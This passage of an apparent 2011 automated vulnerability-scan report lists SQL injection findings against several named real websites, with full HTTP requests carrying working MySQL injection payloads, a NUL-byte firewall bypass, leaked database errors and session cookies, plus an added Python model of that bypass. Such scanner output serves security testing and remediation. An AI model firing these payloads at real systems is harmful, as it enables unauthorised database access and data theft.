Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:52 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 4888
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.18. http://www.insideup.com/ppc/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27&1'=1 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:19:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5103
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
cat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(se' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27&1''=1 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:19:31 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 4928
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.19. http://www.insideup.com/ppc/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2/1'B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:19:35 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5103
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
cat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))%2/1'B'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''B'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+' at line 5

1.20. http://www.nutter.com/careers.php [CareerID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nutter.com
Path:   /careers.php

Issue detail

The CareerID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the CareerID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /careers.php?CategoryID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&CareerID=17'&SectionID=380 HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:09:14 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 15946

<!-- careers start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
</div>
error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 | 1064<BR>
...[SNIP]...

1.21. http://www.nutter.com/careers.php [CategoryID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nutter.com
Path:   /careers.php

Issue detail

The CategoryID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the CategoryID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /careers.php?CategoryID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))'&CareerID=17&SectionID=380 HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:08:37 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 15841

<!-- careers start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<br />
error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' LIMIT 1' at line 1 | 1064<BR>
...[SNIP]...

1.22. http://www.soundingsonline.com/archives/'+NSFTW+' [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /archives/'+NSFTW+'

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /archives/'+NSFTW+''?ordering=&searchphrase=all HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 19:19:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 25 Mar 2011 19:19:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?ordering=&searchphrase=all' AND cookie_info=''' at line 1</font>
...[SNIP]...

1.23. http://www.soundingsonline.com/archives/'+NSFTW+' [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /archives/'+NSFTW+'

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /archives/'+NSFTW+'?ordering=&searchphrase=all&1'=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 19:17:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 25 Mar 2011 19:17:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

1.24. http://www.soundingsonline.com/archives/'+NSFTW+' [ordering parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /archives/'+NSFTW+'

Issue detail

The ordering parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the ordering parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /archives/'+NSFTW+'?ordering='&searchphrase=all HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 19:13:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 25 Mar 2011 19:13:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

1.25. http://www.soundingsonline.com/archives/'+NSFTW+' [searchphrase parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /archives/'+NSFTW+'

Issue detail

The searchphrase parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the searchphrase parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /archives/'+NSFTW+'?ordering=&searchphrase=all' HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 19:15:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 25 Mar 2011 19:15:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''?ordering=&searchphrase=all'' AND cookie_info=''' at line 1</font>
...[SNIP]...

1.26. https://www.supermedia.com/help/direct-mail [trafficSource cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.supermedia.com
Path:   /help/direct-mail

Issue detail

The trafficSource cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the trafficSource cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /help/direct-mail HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: https://www.supermedia.com/help
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4487424B77C0217B5BAEF5DAE41C714C.app4-a2; trafficSource=default%00'; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=session#1301080493266-271579#1301083842|check#true#1301082042; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:39:41 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 26678


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Ddirect Mail</title>


<link type="text/css" rel="st
...[SNIP]...
e, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=ac3d5"-alert(1)-"2bfe3cee0a";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="No such flow definition with id '(select 1 and row(1,1)>
...[SNIP]...

Request 2

GET /help/direct-mail HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: https://www.supermedia.com/help
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4487424B77C0217B5BAEF5DAE41C714C.app4-a2; trafficSource=default%00''; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=session#1301080493266-271579#1301083842|check#true#1301082042; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:39:42 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 25146


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Ddirect Mail</title>


<link type="text/css" rel="st
...[SNIP]...
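The issue detail above rests on a mismatch between how a native-code filter and a length-aware runtime read the same cookie bytes. The example below is added here and is not code from the report or from supermedia.com: ctypes.c_char_p stands in for the native WAF (it reads a buffer only up to the first NUL, as strlen() and strstr() do), the quote-blacklist is an assumed model of the blocked characters, and the three cookie values are the ones from Request 1, Request 2 and the plain single-quote case.

```python
import ctypes
from urllib.parse import unquote_to_bytes


def native_view(buf: bytes) -> bytes:
    """What C code sees: ctypes.c_char_p reads the buffer up to the first NUL,
    exactly like strlen()/strstr() inside a native-code WAF."""
    return ctypes.c_char_p(buf).value


def managed_view(buf: bytes) -> bytes:
    """What a length-aware runtime (Java, PHP, Python, ...) sees: every byte."""
    return bytes(buf)


def waf_blocks(cookie: bytes) -> bool:
    """Assumed native blacklist: block when the C-string view holds a quote."""
    return b"'" in native_view(cookie)


def waf_blocks_fixed(cookie: bytes) -> bool:
    """Length-aware check that also refuses embedded NUL bytes outright,
    so no later native component can be given a shorter string."""
    v = managed_view(cookie)
    return b"\x00" in v or b"'" in v


def quote_reaches_backend(cookie: bytes, waf) -> bool:
    """True when the WAF passes the request but the application still hands
    a quote character on to the database layer."""
    return (not waf(cookie)) and b"'" in managed_view(cookie)


# Constructed inputs: raw trafficSource values as they travel in the Cookie header.
SAMPLES = ["default'", "default%00'", "default%00''"]


def scan(raw_values, waf=waf_blocks) -> dict:
    """URL-decode each value and report whether a quote gets past the WAF."""
    return {raw: quote_reaches_backend(unquote_to_bytes(raw), waf) for raw in raw_values}


if __name__ == "__main__":
    for raw, leaked in scan(SAMPLES).items():
        print(f"{raw!r:16} native sees {native_view(unquote_to_bytes(raw))!r:12} quote reaches backend: {leaked}")
```

With the default WAF only the plain single quote is blocked; both %00 variants pass the native check and still deliver a quote to the backend, which is the behaviour the two responses above show. With waf_blocks_fixed none of the three pass.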

1.27. http://www.vcahospitals.com/tools/markers_sema.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /tools/markers_sema.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /tools/markers_sema.php?sema='+OR+'ns'%3/1'd'ns HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:36 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 198
Content-Type: text/html

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''d'ns' AND i_emergency_only <> 1
   ORDER BY distance' at line 24

1.28. http://www.vcahospitals.com/tools/markers_sema.php [sema parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /tools/markers_sema.php

Issue detail

The sema parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sema parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /tools/markers_sema.php?sema='+OR+'ns'%3d'ns' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:14:01 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 197
Content-Type: text/html

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''ns'' AND i_emergency_only <> 1
   ORDER BY distance' at line 24

